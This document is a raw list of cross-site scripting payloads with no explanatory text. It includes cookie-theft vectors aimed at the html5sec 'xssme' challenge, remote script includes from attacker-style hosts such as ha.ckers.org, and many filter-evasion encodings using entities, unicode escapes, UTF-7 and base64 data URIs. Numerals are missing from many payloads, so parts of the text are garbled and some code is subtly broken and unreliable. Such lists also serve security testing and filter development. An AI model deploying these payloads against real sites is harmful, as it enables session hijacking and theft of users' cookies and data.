<script> document.getElementById(%22safe123%).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%).click({'type':'click','isTrusted':true}); </script>

<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%).click(test); </script>

<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>

<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%%%253Bfff.open%%2522GET%%252C%2522xssme2%%%253Bfff.onreadystatechange%253Dfunction%%%257Bif%%2528fff.readyState%253D%253D4%%%%2520fff.status%253D%253D200%%257Balert%2528fff.responseText%%253B%257D%257D%253Bfff.send%%%253B></iframe>

<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(,,,,),isTrusted:true})); </script>

<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[]);   event.initEvent(text[], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #

<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%;getElementById(%22safe123%).click=function()+{alert(Safe.get());};getElementById(%22safe123%).click(test);</SCRIPT>#

<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%); } } xmlHttp.send(null); }; </script>#

<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%

<script for=document event=onreadystatechange>getElementById('safe123').click()</script>

<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>

<iframe src=%% onload=%22frames[].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==){alert(r.responseText.substr(,));}<\/script>%26quot;)%></iframe>

<iframe src=%% onload=%22content.frames[].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==){alert(r.responseText.substr(,));}<\/script>%26quot;)%></iframe>

<iframe src=%% onload=%22self.frames[].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==){alert(r.responseText.substr(,));}<\/script>%26quot;)%></iframe>

<iframe src=%% onload=%22top.frames[].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==){alert(r.responseText.substr(,));}<\/script>%26quot;)%></iframe>

<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#

<iframe onload=%22write('<script>'%2Blocation.hash.substr()%2B'</script>')%></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[]) };xhr.send();

<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[])</script>

<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%%253D%2520function()%%257B%2520alert(xhr.responseText.match(%252Fcookie%%253D%'(.*%253F)'%252F)%255B1%255D)%%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>

<iframe onload=%22write('<script>'%2Blocation.hash.substr()%2B'</script>')%></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[]) };xhr.send();

<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[])</script>

<script>function x(window) { eval(location.hash.substr()) }</script><iframe id=iframe src=%22javascript:parent.x(window)%><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[]) };xhr.send();

<textarea id=ta onfocus=%22write('<script>alert(1)</script>')% autofocus></textarea>

<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%>

<script>function x(window) { eval(location.hash.substr()) }; open(%22javascript:opener.x(window)%)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[]) };xhr.send();

%3Cscript%3Exhr=new%20ActiveXObject%%22Msxml2.XMLHTTP%%;xhr.open%%22GET%,%/xssme2%,true%;xhr.onreadystatechange=function%%{if%28xhr.readyState==%%26xhr.status==%{alert%28xhr.responseText.match%/%%[^%]%2b%/%[]%}};xhr.send%%;%3C/script%3E

<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>

<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E

<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[],'innerHTML')().match(/d.*'/));</script>

<a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button>

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

<var onmouseover="prompt(1)">On Mouse Over</var>?

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%<!--'%><script>alert(1);</script -->

<script src="data:text/javascript,alert(1)"></script>

<iframe/src \/\/onload = prompt()

<iframe/onreadystatechange=alert()

<svg/onload=alert()

<input value=<><iframe/src=javascript:confirm()

<input type="text" value=``<div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%></iframe> ?

<svg><script ?>alert()

<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%&Tab;&Tab;%></iframe>

<img src=`xx:xx`onerror=alert()>

<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?

<math><a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

<svg contentScriptType=text/vbs><script>MsgBox+

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

<script/src=data&colon;text/j\u0061v\u0061&#&#&#&#&#&#,\u0061%6C%%%(/XSS/)></script ????????????

<object data=javascript&colon;\u0061l&#%72t()>

<script>+-+--+-+alert()</script>

<body/onload=&lt;!--&gt;&#10alert()>

<script itworksinallbrowsers>/*<script* */alert()</script ?

<img src ?itworksonchrome?\/onerror = alert()???

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert()

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script:&#97lert()>ClickMe

<script x> alert() </script =

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert()> --!>

<script/src=&#&#&#&#:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert()></script> ?

<div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>?

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert()>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

<iframe  src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a  href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click  Me</a>

"><img src=x onerror=prompt(1);>

<SCRIPT>alert('XSS');</SCRIPT>

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG SRC=javascript:alert(String.fromCharCode(,,))>

SRC=&#<IMG ;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;>

<IMG SRC=&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav    ascript:alert('XSS');">

<IMG SRC="jav	ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

<IMG SRC=" &#14;  javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

<IMG SRC="javascript:alert('XSS')"

<SCRIPT>a=/XSS/

\";alert('XSS');//

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">

<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<XSS STYLE="xss:expression(alert('XSS'))">

exp/*<XSS STYLE='no\xss:noxss("*//*");

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

getURL("javascript:alert('XSS')")

a="get";

<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">

<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>

<HTML><BODY>

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';

<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<svg%0Aonload=%09((pro\u006dpt))()//

<sCriPt x>(((confirm)))``</scRipt x>

<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z

<deTAiLs/open/oNtoGGle=confirm()>

<scRiPt y="><">/*<sCRipt* */prompt()</script

<A href="javascript%26colon;confirm()">click

<sVg oNloaD=write()>

<A href=javas%#;ript:alert()>click

<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>

<svG/x=">"/oNloaD=confirm()//

<--`<iMG/srC=` onerror=confirm``> --!>

<SVg </onlOad ="1> (_=prompt,_(1)) "">

<!--><scRipT src=//14.rs>

<sCriPt/src=//14.rs?

<sCRIpt x=">" src=//15.rs></script>

<D3/OnMouSEenTer=[].find(confirm)>z

<D3"<"/OncLick="1>[confirm``]"<">z

<D3/OnpOinTeReENter=confirm``>click here

<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`` //>

<Z oncut=alert()>x

<iFrAMe/src \/\/onload = prompt()

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

<div id=""><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>

<div id=""><animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert()&gt;>//["'`-->]]>]</div>

<div id=""><link rel=stylesheet href=data:,*%7bx:expression(alert())%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>

<div id=""><!-- up to Opera 11.52, FF 3.6. -->

<![><img src="]><img src=x onerror=alert(39)//">

<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.+, GC7+  -->

<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div>

<div id=""><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>

<div id=""><li style=list-style:url() onerror=alert()></li>

<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert()></div>//["'`-->]]>]</div>

<div id=""><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>

<div id=""><?xml version="1.0" standalone="no"?>

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<style type="text/css">

@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}

</style>

</head>

<body>Hello</body>

</html>//["'`-->]]>]</div>

<div id=""><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id=""><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>

<div id=""><xml id="xss" src="test.htc"></xml>

<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>

<div id=""><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>

